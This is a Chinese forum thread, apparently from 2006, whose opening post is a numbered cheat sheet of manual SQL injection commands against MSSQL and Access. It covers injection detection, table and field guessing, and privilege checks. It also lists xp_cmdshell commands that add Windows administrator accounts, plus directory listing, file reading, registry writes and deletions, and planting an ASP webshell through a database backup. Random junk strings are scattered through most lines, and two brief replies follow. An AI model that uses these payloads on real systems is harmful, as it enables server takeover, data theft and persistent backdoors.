社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4287阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 xW^<.@Agm  
  2.初步判断是否是mssql ;and user>0 Y- w5S|!  
WFh!re%Z  
  3.注入参数是字符'and [查询条件] and ''=' C( r?1ma  
2Hq!YsJ4]  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' :`uo]B"  
c[;I\g  
  5.判断数据库系统 VX- f~  
0_Y;r{3m"  
  ;and (select count(*) from sysobjects)>0 mssql _mn4z+  
g:*yjj  
  ;and (select count(*) from msysobjects)>0 access AU7c = H:?  
[PU.lRq  
]w')~yk  
_=cMa's  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 M`5^v0,C  
Oi{jzP  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 $U6)km4  
TRQva8d?  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 KpK'?WhX7^  
T[7- 3[w<)  
  9.(1)猜字段的ascii值(access) *D9QwQ _|  
3W27R  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 sDwSEg>#B  
9EH%[wfv  
  (2)猜字段的ascii值(mssql) V1Fdt+#  
LOOv8'%O8  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 *=ALns?y  
apYf,"|9  
  10.测试权限结构(mssql) N(IUNL  
uH7u4f1Q  
yqAw7GaBN  
|fa3;8!96  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- $60+}B`m  
sNNt0q(  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- AAs&wYp8Yh  
SIg=_oa   
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- #2`tsZ]=I  
&-&6ARb7o  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- b_6j77  
%f^TZ,q$  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- rA_e3L@v#[  
u''(;U[  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- \?}ZXKuJj  
ABx0IdOcI  
  ;and 1=(select IS_MEMBER('db_owner'));-- {Ji[d.cY  
kdv>QZ  
UyvFR@  
le1'r>E$  
  11.添加mssql和系统的帐户 s^E%Uk m  
ANWa%%\T  
  ;exec master.dbo.sp_addlogin username;-- Z3Vi il:  
  ;exec master.dbo.sp_password null,username,password;-- z:acrQwJ?1  
)! OEa]  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 6 .*=1P*?  
ty "k  
  ;exec master.dbo.xp_cmdshell 'net user username password g~`UC  
^6obxwVG  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 0t<TZa]V  
ni3^J5XW  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- V-)q&cbW]q  
sbG3,'i)  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ~s !+9\Fi  
Ldig/:  
*VD-c  
8_:jPd! 3  
  12.(1)遍历目录 z5Po,@W  
C:H9C  
  ;create table dirs(paths varchar(100), id int) B!9<c9/ P]  
dhV =;'   
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' 9GCxF`OB  
UoBu0Rx  
  ;and (select top 1 paths from dirs)>0 F|Ou5WD  
PInU-"gG  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ;Qw>&24h[  
Wb^YqqE  
p6>3 p  
t\'URpa+5%  
  (2)遍历目录 qQ^]z8g6P  
`L0}^ |`9  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- }yXa1#3  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 k(V#{ YP  
8Kv=Zp,?`  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 |2^cPnv?G&  
U@i+XZc"S  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 K /. ;N.9  
>/-<,,<\C  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 @m#7E4 +  
[NyR$yD{  
^cX);koO  
r"k\G\,%  
  13.mssql中的存储过程 e6,/ i  
Ey 4GyAl  
  xp_regenumvalues 注册表根键, 子键 D4[t@*m>7  
Un7jzAvQ  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 MdCEp1Z  
\V}?K0#bt  
  xp_regread 根键,子键,键值名 Z^s&]  
-2bu`oD `  
  ;exec xp_regread _0ep[r  
YJF!_kg.  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 `WX @1]m  
-Y;(yTtz  
  xp_regwrite 根键,子键, 值名, 值类型, 值 >e'6RZRLA  
@G^ l`%  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 mD=x3d  
1VH7z  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Bv@NE2  
1Hk`i%  
  xp_regdeletevalue 根键,子键,值名 ^~( @QfY  
/+iU1m'(  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 yB,$4:C  
4E<iIA\x  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 6 [w_ /X"  
A6pPx1-&  
0c /xE<h  
\"|E8A6/  
  14.mssql的backup创建webshell K+2<{qwh  
/ 9^:*,  
  use model FUiEayM  
~X)Aw 3}F  
  create table cmd(str image); #]cO] I  
M qFuZg  
  insert into cmd(str) values (''); )jm}h7,  
5Ta<$t  
  backup database model to disk='c:\l.asp'; r3{Cuz  
=c[9:&5Q  
`ZC_F! E  
#J# x,BLI  
  15.mssql内置函数 /X9Kg  
#px74EeI\  
  ;and (select @@version)>0 获得Windows的版本号 fH}#.vy  
(V!:6  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa [x{'NwP?  
}f?$QSF  
  ;and (select user_name())>0 爆当前系统的连接用户 R %aed>zo  
M4~^tML>Ey  
  ;and (select db_name())>0 得到当前连接的数据库 D!^&*Ia?2  
:Z3Tyj}4  
W; P8=q  
lpv Z[^G  
  16.简洁的webshell o]u,<bM$  
e5W 8YNA  
  use model W+k SL{0  
#R-l2OO^]  
  create table cmd(str image); nc4KeEl  
#{-B`FAQ  
  insert into cmd(str) values (''); J!YB_6b  
vz[oy|{F  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您在写长篇帖子又不马上发表,建议存为草稿
认证码:
验证问题:
10+5=?,请输入中文答案:十五